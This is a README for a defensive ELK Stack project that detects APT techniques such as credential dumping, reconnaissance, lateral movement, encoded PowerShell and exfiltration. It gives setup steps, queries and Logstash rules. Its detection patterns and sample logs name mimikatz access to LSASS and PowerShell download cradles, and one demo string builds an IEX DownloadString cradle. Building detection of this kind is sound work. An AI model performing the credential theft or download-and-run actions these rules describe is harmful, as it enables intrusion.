This project implements a complete Advanced Persistent Threat (APT) detection system using the ELK Stack (Elasticsearch, Logstash, Kibana) with Beats for log collection. The system detects various stages of APT attacks including:
- Credential Dumping (MITRE T1003)
- Internal Reconnaissance (MITRE T1087, T1018, T1082)
- Lateral Movement (MITRE T1021)
- PowerShell Execution (MITRE T1059.001)
- Data Exfiltration (MITRE T1041, T1048)
```
apt-detection-elk/
├── docker-compose.yml                    # ELK Stack orchestration
├── logstash/
│   └── pipeline/
│       └── beats-input.conf              # Main Logstash pipeline with detection logic
├── beats/
│   ├── filebeat/
│   │   └── filebeat.yml                  # File log collection config
│   ├── winlogbeat/
│   │   └── winlogbeat.yml                # Windows Event Log collection
│   └── packetbeat/
│       └── packetbeat.yml                # Network traffic monitoring
├── detection-rules/
│   ├── 01-credential-dumping.json        # Credential access detection
│   ├── 02-reconnaissance.json            # Discovery activities detection
│   ├── 03-lateral-movement.json          # Lateral movement detection
│   └── 04-powershell-exfiltration.json   # Execution & exfiltration detection
├── kibana-dashboards/                    # Dashboard configurations
├── sample-data/                          # APT sample datasets
├── scripts/
│   ├── create-kibana-dashboards.sh       # Dashboard setup script
│   └── generate-sample-apt-data.sh       # Sample data generator
└── README.md                             # This file
```
```
┌─────────────────┐
│   Log Sources   │
│ (Windows/Linux) │
│ • Sysmon        │
│ • Security      │
│ • PowerShell    │
│ • Network       │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Beats Agents   │
│ • Filebeat      │
│ • Winlogbeat    │
│ • Packetbeat    │
└────────┬────────┘
         │ Port 5044
         ▼
┌─────────────────┐
│    Logstash     │
│ • Parse logs    │
│ • Apply filters │
│ • Enrich data   │
│ • Detect threats│
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│  Elasticsearch  │
│ • Index data    │
│ • Store events  │
│ • Run queries   │
└────────┬────────┘
         │
         ▼
┌─────────────────┐
│     Kibana      │
│ • Visualize     │
│ • Dashboard     │
│ • Alerts        │
└─────────────────┘
```
- Log Collection: Beats agents collect logs from endpoints, servers, and network
- Data Ingestion: Logs are forwarded to Logstash via port 5044
- Parsing & Enrichment: Logstash parses logs and adds threat indicators
- Threat Detection: Pattern matching against APT signatures
- Indexing: Events are indexed in Elasticsearch
- Alerting: Threats are tagged and routed to the `apt-threats-*` index
- Visualization: Kibana dashboards display detected activities
- Docker and Docker Compose installed
- 4GB+ RAM available for containers
- 10GB+ disk space
- Linux (Arch/Ubuntu/Debian) or macOS host
The easiest way to get started is using the automated startup script:
```
# Run the automated setup script
./start.sh
```

This script will:
- ✅ Check Docker and Docker Compose installation
- ✅ Start all ELK Stack services
- ✅ Wait for Elasticsearch and Kibana to be ready
- ✅ Generate sample APT attack data
- ✅ Create Kibana dashboards and visualizations
- ✅ Display system status and access points
That's it! The system will be fully operational in 2-3 minutes.
If you prefer manual setup:
```
# 1. Make scripts executable
chmod +x scripts/*.sh

# 2. Start ELK Stack
docker-compose up -d

# 3. Wait for services (2-3 minutes)
docker-compose ps

# 4. Generate sample data
cd scripts
./generate-sample-apt-data.sh

# 5. Create dashboards
./create-kibana-dashboards.sh
```

Verify the installation:

```
# Check Elasticsearch
curl http://localhost:9200

# Check Kibana (wait until ready)
curl http://localhost:5601/api/status
```

Expected output: Elasticsearch should return cluster version info, and the Kibana status API should report a "green" state.
```
cd scripts
./generate-sample-apt-data.sh
```

This creates sample logs simulating:
- Mimikatz credential dumping
- Reconnaissance commands
- RDP lateral movement
- Encoded PowerShell execution
- Large data transfers
Open your browser and navigate to:
http://localhost:5601
- Go to Management → Stack Management → Index Patterns
- Create pattern `apt-detection-*` with time field `@timestamp`
- Create pattern `apt-threats-*` with time field `@timestamp`

Or run the automated script:

```
cd scripts
./create-kibana-dashboards.sh
```

Once the system is running, open your web browser and navigate to:
http://localhost:5601
No authentication required (development mode)
- Click the ☰ Menu button (top left corner)
- Go to Analytics → Discover
- You'll see the data exploration interface
- Click the dropdown at the top left (below the search bar)
- Select `apt-detection-*` to see all collected events (~3,790 documents)
- Or select `apt-threats-*` to see only detected threats
By default, you'll see all events with their timestamps. Each event contains:
- `@timestamp` - When the event occurred
- `host.name` - Source machine
- `message` - Event details
- `threat_detected` - Type of threat (if detected)
- `mitre_technique` - MITRE ATT&CK technique ID
- `severity` - Threat severity level
Use the search bar at the top to filter events. Examples:
Find Credential Dumping:
threat_detected: "credential_dumping"
Find Reconnaissance Activity:
threat_detected: "reconnaissance"
Find Critical Threats:
severity: "critical"
Find Multiple Threat Types:
threat_detected: ("credential_dumping" OR "lateral_movement")
Find Threats on Specific Host:
host.name: "VICTIM-PC" AND _exists_: threat_detected
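These KQL filters have Elasticsearch query DSL equivalents that can be sent to the search API directly. A minimal Python sketch (the structure is illustrative; field names match those used in this project):

```python
import json

def threat_query(threat_type):
    """Query DSL equivalent of the KQL filter `threat_detected: "<type>"`."""
    return {"query": {"match": {"threat_detected": threat_type}}}

def host_threat_query(hostname):
    """Equivalent of `host.name: "<host>" AND _exists_: threat_detected`."""
    return {
        "query": {
            "bool": {
                "must": [
                    {"term": {"host.name": hostname}},
                    {"exists": {"field": "threat_detected"}},
                ]
            }
        }
    }

# These bodies can be POSTed to /apt-detection-*/_search
print(json.dumps(host_threat_query("VICTIM-PC"), indent=2))
```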
- Click on any event to expand it
- You'll see all fields including:
- threat_detected - Attack type
- mitre_technique - MITRE ATT&CK ID (e.g., T1003.001)
- mitre_tactic - Attack tactic (e.g., Credential Access)
- severity - critical/high/medium
- winlog.event_data - Windows event details
- network - Network traffic data
- Click the time picker at the top right
- Select a time range:
- Last 15 minutes
- Last 1 hour
- Last 24 hours
- Custom range
- Data will refresh automatically
- Go to ☰ Menu → Analytics → Dashboard
- Click Create dashboard
- Click Create visualization
- Choose visualization type:
- Bar chart - Compare threat counts
- Pie chart - Show threat distribution
- Line chart - Show threats over time
- Data table - List detailed events
- Go to ☰ Menu → Stack Management → Rules
- Click Create rule
- Choose Elasticsearch query
- Set up alert conditions:
  - Index: `apt-threats-*`
  - Query: `severity: "critical"`
  - Threshold: Count > 0
- Configure notifications (email, Slack, etc.)
| Severity | Description | Examples |
|---|---|---|
| Critical | Immediate action required | Credential dumping, Data exfiltration |
| High | Potential breach in progress | Lateral movement, PowerShell execution |
| Medium | Suspicious activity | Reconnaissance, Port scanning |
- MITRE: T1003.001
- What: Mimikatz, LSASS access, password dumpers
- Indicators:
- Source: mimikatz.exe, procdump.exe
- Target: lsass.exe
- Event ID: 10 (process access)
Search Query:
threat_detected: "credential_dumping"
- MITRE: T1087, T1082
- What: System/network enumeration
- Indicators:
- Commands: whoami, net user, ipconfig, netstat
- Active Directory queries
Search Query:
threat_detected: "reconnaissance"
- MITRE: T1021.001, T1021.002
- What: Moving between systems
- Indicators:
- RDP connections (LogonType 10)
- SMB access (LogonType 3)
- PSExec usage
Search Query:
threat_detected: "lateral_movement"
- MITRE: T1059.001
- What: Malicious PowerShell usage
- Indicators:
- Base64 encoded commands
- Download cradles (Invoke-WebRequest)
- Invoke-Expression (IEX)
Search Query:
threat_detected: ("encoded_powershell" OR "powershell_download")
- MITRE: T1041
- What: Large data transfers out
- Indicators:
- Transfer size > 10MB
- Unusual destination IPs
- High volume traffic
Search Query:
threat_detected: "data_exfiltration"
Find all credential dumping attacks:
curl -s 'http://localhost:9200/apt-detection-*/_search?pretty' \
-H 'Content-Type: application/json' -d '{
"query": {
"match": {"threat_detected": "credential_dumping"}
},
"size": 5
}'Find all critical threats:
curl -s 'http://localhost:9200/apt-detection-*/_search?pretty' \
-H 'Content-Type: application/json' -d '{
"query": {
"term": {"severity": "critical"}
},
"size": 10
}'Count threats by type:
curl -s 'http://localhost:9200/apt-detection-*/_search?pretty' \
-H 'Content-Type: application/json' -d '{
"size": 0,
"aggs": {
"threat_types": {
"terms": {"field": "threat_detected.keyword", "size": 10}
}
}
}'For more examples, see: SEARCH_EXAMPLES.md
What it detects:
- LSASS process access (Event ID 10)
- Mimikatz execution
- SAM registry access
- NTDS.dit file access
Example Query:

```
GET /apt-detection-*/_search
{
  "query": {
    "bool": {
      "must": [
        { "term": { "winlog.event_id": 10 } },
        { "regexp": { "winlog.event_data.TargetImage": ".*lsass\\.exe" } }
      ]
    }
  }
}
```

Why it works: Mimikatz and similar tools must access LSASS memory to dump credentials, and Sysmon Event ID 10 logs process access events.
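The same check can be mirrored outside the pipeline; a small Python sketch (illustrative only, not part of the Logstash config) that applies the rule to a Sysmon-style event:

```python
import re

# Case-insensitive match on the target image path, mirroring the detection rule
LSASS_RE = re.compile(r"(?i).*lsass\.exe$")

def is_credential_dumping(event):
    """Flag Sysmon Event ID 10 events whose TargetImage is lsass.exe."""
    data = event.get("winlog", {})
    target = data.get("event_data", {}).get("TargetImage", "")
    return data.get("event_id") == 10 and bool(LSASS_RE.match(target))

event = {
    "winlog": {
        "event_id": 10,
        "event_data": {
            "SourceImage": "C:\\Tools\\mimikatz.exe",
            "TargetImage": "C:\\Windows\\System32\\lsass.exe",
        },
    }
}
print(is_credential_dumping(event))  # True
```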
What it detects:
- `whoami`, `net user`, `net group` commands
- `ipconfig`, `netstat`, `systeminfo`
- Active Directory queries
- Network scanning
Example Query:

```
GET /apt-detection-*/_search
{
  "query": {
    "regexp": {
      "message": ".*\\b(whoami|net user|net group|nltest)\\b.*"
    }
  }
}
```

Why it works: Attackers enumerate the environment to identify targets and privilege escalation paths.
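The regexp above translates directly to a host-side check; a Python sketch (illustrative, not part of the pipeline) of the same pattern applied to a log message:

```python
import re

# Word-boundary match on common enumeration commands, as in the query above
RECON_RE = re.compile(r"\b(whoami|net user|net group|nltest)\b", re.IGNORECASE)

def is_reconnaissance(message):
    """True if the log message contains a known enumeration command."""
    return RECON_RE.search(message) is not None

print(is_reconnaissance("cmd.exe /c whoami /all"))       # True
print(is_reconnaissance("svchost.exe started normally")) # False
```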
What it detects:
- RDP connections (LogonType 10)
- SMB lateral movement (LogonType 3)
- PSExec usage
- WMI remote execution
- Admin share access
Example Query:

```
GET /apt-detection-*/_search
{
  "query": {
    "bool": {
      "must": [
        { "term": { "winlog.event_id": 4624 } },
        { "term": { "winlog.event_data.LogonType": "10" } }
      ]
    }
  }
}
```

Why it works: Network logon types indicate remote access attempts, essential for lateral movement.
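The logon-type logic can be sketched as a small classifier in Python (illustrative; the type labels here are my own shorthand for the Windows logon types used above):

```python
# Windows logon types of interest for lateral-movement detection
REMOTE_LOGON_TYPES = {
    "3": "network (SMB/admin shares)",
    "10": "remote interactive (RDP)",
}

def classify_logon(event_id, logon_type):
    """Label successful logons (Event ID 4624) whose type implies remote access."""
    if event_id != 4624:
        return None
    return REMOTE_LOGON_TYPES.get(str(logon_type))

print(classify_logon(4624, "10"))  # remote interactive (RDP)
print(classify_logon(4624, "2"))   # None (local interactive logon)
```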
What it detects:
- Base64 encoded commands
- Download cradles (`Invoke-WebRequest`, `DownloadString`)
- `Invoke-Expression` (IEX)
- Reflection and assembly loading
- PowerShell remoting
Example Query:

```
GET /apt-detection-*/_search
{
  "query": {
    "regexp": {
      "winlog.event_data.CommandLine": ".*-[Ee]nc.*[A-Za-z0-9+/]{50,}.*"
    }
  }
}
```

Why it works: Encoded PowerShell is commonly used to evade signature-based detection.
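Analysts often want to decode the payload once the pattern fires. A Python sketch (illustrative; the URL in the sample payload is hypothetical) that finds the base64 blob after an `-enc`-style flag and decodes it the way PowerShell does, as UTF-16LE:

```python
import base64
import re

# Long base64 run following an -Enc / -EncodedCommand style flag
ENC_RE = re.compile(r"-[Ee]nc\w*\s+([A-Za-z0-9+/=]{50,})")

def find_encoded_payload(cmdline):
    """Return the decoded PowerShell payload, or None if no encoded flag is found."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    # PowerShell encodes the script as UTF-16LE before base64
    return base64.b64decode(m.group(1)).decode("utf-16-le")

# Build a sample encoded command line (hypothetical download cradle)
payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.com/p.ps1')"
encoded = base64.b64encode(payload.encode("utf-16-le")).decode()
cmdline = f"powershell.exe -NoP -Enc {encoded}"
print(find_encoded_payload(cmdline))
```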
What it detects:
- Large outbound transfers (>10MB)
- Unusual ports (FTP, custom ports)
- DNS tunneling
- High volume DNS queries
Example Query:

```
GET /apt-detection-*/_search
{
  "query": {
    "bool": {
      "must": [
        { "range": { "network.bytes": { "gte": 10485760 } } },
        { "term": { "network.direction": "outbound" } }
      ]
    }
  }
}
```

Why it works: Large data transfers to external IPs indicate potential exfiltration.
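The threshold logic is simple enough to state as code; a Python sketch (illustrative, using a flat dict in place of the real Packetbeat event shape):

```python
TEN_MB = 10 * 1024 * 1024  # 10485760, matching the network.bytes threshold above

def is_exfil_candidate(flow):
    """Flag outbound flows at or above the 10 MB threshold."""
    return flow.get("direction") == "outbound" and flow.get("bytes", 0) >= TEN_MB

print(is_exfil_candidate({"direction": "outbound", "bytes": 52_428_800}))  # True
print(is_exfil_candidate({"direction": "inbound", "bytes": 52_428_800}))   # False
```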
1. Attack Simulation

   Sample log (already generated):

   ```
   {
     "@timestamp": "2024-01-15T10:23:45Z",
     "host": {"name": "VICTIM-PC"},
     "winlog": {
       "event_id": 10,
       "event_data": {
         "SourceImage": "C:\\Tools\\mimikatz.exe",
         "TargetImage": "C:\\Windows\\System32\\lsass.exe",
         "GrantedAccess": "0x1FFFFF"
       }
     }
   }
   ```

2. Logstash Detection

   The Logstash pipeline detects this pattern:

   ```
   if [winlog][event_data][TargetImage] =~ /(?i)lsass\.exe/ {
     mutate {
       add_field => {
         "threat_detected" => "credential_dumping"
         "mitre_technique" => "T1003.001"
         "severity" => "critical"
       }
       add_tag => ["apt_detected", "credential_access"]
     }
   }
   ```

3. Elasticsearch Indexing

   The event is indexed to `apt-threats-*` with enriched fields.

4. Kibana Alert

   Query in Kibana Discover:

   ```
   threat_detected: "credential_dumping" AND severity: "critical"
   ```

5. Investigation

   The security analyst sees:
   - Process: `mimikatz.exe`
   - Target: `lsass.exe`
   - MITRE Technique: T1003.001
   - Recommended Action: Isolate host, reset credentials
All detection rules are in the detection-rules/ directory. Each file contains:
- Rule description
- MITRE ATT&CK mapping
- Elasticsearch DSL queries
- Example usage
To test a rule:

```
# Example: Test credential dumping detection
curl -X GET "localhost:9200/apt-detection-*/_search?pretty" \
  -H 'Content-Type: application/json' \
  -d @detection-rules/01-credential-dumping.json
```

- APT Threat Detection Timeline - Shows threats over time by category
- MITRE ATT&CK Tactics - Pie chart of attack tactics distribution
- Suspicious Processes - Table of processes with threat indicators
- Failed Login Attempts - Timeline of failed authentications
- Network Traffic Anomalies - Outbound traffic volume over time
- Go to Kibana → Dashboard → Create Dashboard
- Add visualizations based on your needs
- Save and share with your team
```
# Start all services
./start.sh
# OR
docker-compose up -d

# Stop all services
docker-compose down

# Stop and remove all data
docker-compose down -v

# Restart all services
docker-compose restart

# Restart specific service
docker-compose restart logstash
```

```
# View all logs
docker-compose logs -f

# View specific service logs
docker-compose logs -f elasticsearch
docker-compose logs -f kibana
docker-compose logs -f logstash
docker-compose logs -f filebeat

# View last 100 lines
docker-compose logs --tail=100 logstash
```

```
# View service status
docker-compose ps

# Check Elasticsearch health
curl http://localhost:9200/_cluster/health?pretty

# View Elasticsearch indices
curl 'http://localhost:9200/_cat/indices?v'

# Count indexed documents
curl 'http://localhost:9200/apt-detection-*/_count?pretty'

# Check Kibana status
curl http://localhost:5601/api/status
```

```
# Regenerate sample data
cd scripts
./generate-sample-apt-data.sh

# View sample data files
ls -la sample-data/

# Delete specific index
curl -X DELETE 'http://localhost:9200/apt-detection-2025.10.04'

# Delete all detection indices
curl -X DELETE 'http://localhost:9200/apt-detection-*'
```

```
# View container resource usage
docker stats

# View Elasticsearch stats
curl 'http://localhost:9200/_nodes/stats?pretty'

# View Logstash stats
curl 'http://localhost:9600/_node/stats?pretty'
```

Elasticsearch fails to start:

Solution:
```
# Check logs
docker-compose logs elasticsearch

# Increase virtual memory (Linux)
sudo sysctl -w vm.max_map_count=262144

# Make permanent
echo "vm.max_map_count=262144" | sudo tee -a /etc/sysctl.conf

# Restart Elasticsearch
docker-compose restart elasticsearch
```

No data appears in Kibana:

Check 1 - Services Running:

```
docker-compose ps
# All services should show "Up"
```

Check 2 - Indices Created:

```
curl 'http://localhost:9200/_cat/indices?v'
# Should see apt-detection-* indices
```

Check 3 - Logstash Processing:

```
docker-compose logs logstash | grep "Pipeline started"
```

Check 4 - Sample Data Exists:

```
ls -la sample-data/
# Should see .log and .json files
```

Solution:

```
# Restart all services
docker-compose restart

# Wait 30 seconds, then check
curl 'http://localhost:9200/apt-detection-*/_count?pretty'
```

Kibana is not accessible:

Solution:

```
# Check Kibana logs
docker-compose logs kibana

# Wait for message: "Kibana is now available"
# This can take 2-3 minutes on first startup

# If stuck, restart Kibana
docker-compose restart kibana
```

Filebeat is not shipping logs:

Solution:

```
# Check Filebeat logs
docker-compose logs filebeat

# Verify configuration
docker exec -it filebeat filebeat test config

# Restart Filebeat
docker-compose restart filebeat
```

High memory usage:

Solution:

```
# Reduce Java heap size in docker-compose.yml
# Edit these lines:
ES_JAVA_OPTS: "-Xms1g -Xmx1g"     # Reduce from 2g if needed
LS_JAVA_OPTS: "-Xms512m -Xmx512m" # Reduce from 1g if needed

# Restart services
docker-compose down
docker-compose up -d
```

A port is already in use:

Solution:

```
# Check what's using the port
sudo lsof -i :5601  # Kibana
sudo lsof -i :9200  # Elasticsearch
sudo lsof -i :5044  # Logstash

# Stop conflicting service or change port in docker-compose.yml
```

Running out of disk space:

Solution:

```
# Clean up unused Docker resources
docker system prune -a

# Remove old volumes
docker volume prune

# Check disk usage
docker system df
```

To use public APT datasets:
1. Download APT samples from:
   - MITRE Cyber Analytics Repository
   - SecRepo.com
   - Mordor Project (https://github.com/OTRF/Security-Datasets)

2. Convert to a compatible format:

   ```
   # Example for EVTX files
   python3 evtx_to_json.py input.evtx > output.json
   ```

3. Copy to the sample-data directory:

   ```
   cp output.json sample-data/
   ```

4. Restart Filebeat/Logstash:

   ```
   docker-compose restart filebeat logstash
   ```
1. Increase resources in `docker-compose.yml`:

   ```
   ES_JAVA_OPTS: "-Xms4g -Xmx4g"
   ```

2. Enable index lifecycle management:

   ```
   # Delete old indices after 30 days
   curl -X PUT "localhost:9200/_ilm/policy/apt-policy" -H 'Content-Type: application/json' -d'
   {
     "policy": {
       "phases": {
         "delete": { "min_age": "30d", "actions": {"delete": {}} }
       }
     }
   }'
   ```

3. Use a hot-warm-cold architecture for large deployments

4. Enable authentication (X-Pack Security)
- Enable Elasticsearch security (X-Pack)
- Use HTTPS for all connections
- Implement role-based access control
- Encrypt data at rest
- Set up proper firewall rules
- Use secrets management for credentials
| Tactic | Technique | Coverage |
|---|---|---|
| Credential Access | T1003.001 (LSASS Memory) | ✅ Full |
| Credential Access | T1003.002 (SAM) | ✅ Full |
| Credential Access | T1110 (Brute Force) | ✅ Full |
| Discovery | T1087 (Account Discovery) | ✅ Full |
| Discovery | T1082 (System Information) | ✅ Full |
| Lateral Movement | T1021.001 (RDP) | ✅ Full |
| Lateral Movement | T1021.002 (SMB) | ✅ Full |
| Execution | T1059.001 (PowerShell) | ✅ Full |
| Exfiltration | T1041 (C2 Channel) | ✅ Full |
| Exfiltration | T1048 (Alternate Protocol) | ✅ Full |
| Command and Control | T1071.004 (DNS) | ✅ Full |
To add new detection rules:
- Create a new JSON file in
detection-rules/ - Follow the existing format with MITRE mappings
- Add corresponding Logstash filters in
logstash/pipeline/ - Test with sample data
- Document in this README
| File | Description |
|---|---|
| `README.md` | Main documentation (this file) |
| `PROJECT_STATUS.md` | Current system status and access info |
| `SEARCH_EXAMPLES.md` | Comprehensive search query examples |
| `DETECTION_QUERIES.md` | Detection rule explanations |
Located in sample-data/ directory:
- `apt-events.json` - JSON formatted APT events
- `credential-dumping.log` - Mimikatz, LSASS access
- `reconnaissance.log` - System enumeration commands
- `lateral-movement.log` - RDP, SMB, PSExec activity
- `powershell-execution.log` - Encoded PowerShell commands
- `data-exfiltration.log` - Large data transfers
- Kibana UI: http://localhost:5601
- Elasticsearch API: http://localhost:9200
- Logstash Monitoring: http://localhost:9600
- MITRE ATT&CK Framework: https://attack.mitre.org/
- Elastic Security Docs: https://www.elastic.co/guide/en/security/current/index.html
Current state:
- ❌ No authentication required
- ❌ HTTP only (no HTTPS)
- ❌ Default encryption keys
- ❌ No network isolation
- ❌ Debug logging enabled
You MUST implement:
1. Enable X-Pack Security

   ```
   # In docker-compose.yml
   xpack.security.enabled: true
   ```

2. Configure HTTPS
   - Generate SSL certificates
   - Configure Elasticsearch, Kibana, and Logstash with TLS
   - Enable certificate validation

3. Set Strong Encryption Keys

   ```
   # Generate random keys
   openssl rand -base64 32

   # Add to docker-compose.yml
   xpack.security.encryptionKey: "your-random-32-byte-key"
   xpack.encryptedSavedObjects.encryptionKey: "your-random-32-byte-key"
   xpack.reporting.encryptionKey: "your-random-32-byte-key"
   ```

4. Enable Authentication
   - Create users with appropriate roles
   - Implement role-based access control (RBAC)
   - Use strong passwords

5. Network Security
   - Use firewalls to restrict access
   - Implement VPN for remote access
   - Isolate the ELK stack in a private network
   - Use a reverse proxy for external access

6. Data Protection
   - Enable encryption at rest
   - Implement a backup strategy
   - Set up index lifecycle management (ILM)
   - Configure data retention policies

7. Monitoring & Auditing
   - Enable audit logging
   - Monitor for unauthorized access
   - Set up alerting for security events
   - Run regular security assessments
1. Edit the Logstash configuration
   - File: `logstash/pipeline/beats-input.conf`
   - Add detection logic in the `filter` section

   Example:

   ```
   if [message] =~ /(?i)malicious_pattern/ {
     mutate {
       add_field => {
         "threat_detected" => "custom_threat"
         "mitre_technique" => "T1234"
         "severity" => "high"
       }
       add_tag => ["apt_detected", "custom"]
     }
   }
   ```

2. Restart Logstash

   ```
   docker-compose restart logstash
   ```

Edit severity levels in `logstash/pipeline/beats-input.conf`:

```
# Change from "medium" to "high"
mutate {
  add_field => { "severity" => "high" }
}
```
1. Windows Machines:
   - Install Winlogbeat on Windows hosts
   - Configure it to send to Logstash (port 5044)
   - Enable Sysmon for detailed process monitoring

2. Linux Servers:
   - Configure Filebeat on Linux hosts
   - Monitor /var/log files
   - Send to Logstash

3. Network Devices:
   - Configure syslog forwarding
   - Point to Logstash port 5000
Edit `docker-compose.yml`:

```
# Increase Elasticsearch memory
ES_JAVA_OPTS: "-Xms4g -Xmx4g"  # From 2g

# Increase Logstash memory
LS_JAVA_OPTS: "-Xms2g -Xmx2g"  # From 1g
```
1. Index Lifecycle Management (ILM)
   - Automatically delete old indices
   - Move data to cold storage
   - Optimize shard allocation

2. Cluster Scaling
   - Add more Elasticsearch nodes
   - Distribute data across nodes
   - Use dedicated master nodes

3. Logstash Optimization
   - Increase pipeline workers
   - Tune batch sizes
   - Use persistent queues

4. Data Retention

   ```
   # Delete indices older than 30 days
   # (double quotes so the shell expands the date substitution)
   curl -X DELETE "http://localhost:9200/apt-detection-$(date -d '30 days ago' +%Y.%m.%d)"
   ```
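The index name in that retention command can also be computed explicitly; a small Python sketch (assuming the daily `apt-detection-YYYY.MM.DD` naming used by this project):

```python
from datetime import datetime, timedelta, timezone

def retention_index(prefix="apt-detection", days=30, now=None):
    """Name of the daily index that is `days` old, e.g. apt-detection-2025.09.04."""
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=days)
    return f"{prefix}-{cutoff:%Y.%m.%d}"

print(retention_index(now=datetime(2025, 10, 4, tzinfo=timezone.utc)))
# apt-detection-2025.09.04
```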
This APT Detection System is designed to:
- ✅ Detect common APT attack techniques
- ✅ Map detections to MITRE ATT&CK framework
- ✅ Provide real-time visibility into threats
- ✅ Enable security analysts to investigate incidents
- ✅ Demonstrate ELK Stack capabilities for threat detection
| Tactic | Techniques Covered | Detection Rate |
|---|---|---|
| Credential Access | 3 | High |
| Discovery | 5 | High |
| Lateral Movement | 4 | High |
| Execution | 3 | High |
| Exfiltration | 2 | Medium |
| Command & Control | 1 | Medium |
Total: 18 techniques across 6 tactics
Contributions are welcome! To add new features:
- Fork the repository
- Create a feature branch
- Add detection rules or improvements
- Test thoroughly
- Submit a pull request
- 🔍 Additional detection rules
- 📈 More Kibana visualizations
- 📦 Integration with SIEM platforms
- 📚 Documentation improvements
- 🐛 Bug fixes
- ✅ Full ELK Stack integration
- ✅ 5 major threat detection categories
- ✅ Automated setup script
- ✅ Kibana dashboards
- ✅ Sample APT data
- ✅ Comprehensive documentation
Q: Can this detect real APT attacks? A: Yes, but it requires real log data from your environment. The sample data is for demonstration.
Q: How do I add my Windows machines? A: Install Winlogbeat and configure it to send logs to Logstash port 5044.
Q: What are the minimum system requirements? A: 4GB RAM, 10GB disk space, and Docker installed; 8GB RAM is recommended for production.
Q: Can I use this in production? A: Yes, but you MUST enable security features (authentication, HTTPS, encryption).
Q: How do I add custom detection rules?
A: Edit logstash/pipeline/beats-input.conf and add your patterns in the filter section.
Q: Does this replace an enterprise SIEM? A: No, this is a lightweight detection system. Enterprise SIEMs have more features.
Q: Can I integrate this with Splunk/QRadar? A: Yes, you can forward events from Logstash to other SIEM platforms.
Q: How long is data retained? A: By default, indefinitely. Configure ILM to automatically delete old data.
- MITRE ATT&CK Framework
- Elastic Stack Documentation
- Elastic Security
- Sysmon Documentation
- Mordor Security Datasets
- Sigma Rules
- Atomic Red Team
- Project: APT Detection System using ELK Stack
- Built for: SIH CyberSec Project
- Purpose: Advanced Persistent Threat Detection & Analysis
For questions, issues, or suggestions:
- Check documentation files (README.md, PROJECT_STATUS.md, SEARCH_EXAMPLES.md)
- Review troubleshooting section
- Check logs: `docker-compose logs -f`
- Create an issue in the repository
Built with:
- Elasticsearch - Search and analytics engine
- Logstash - Data processing pipeline
- Kibana - Data visualization
- Beats - Lightweight data shippers
- Docker - Containerization platform
Thanks to the Elastic community and security researchers for their contributions.
🎉 Happy Threat Hunting!
Built for SIH CyberSec Project - APT Detection System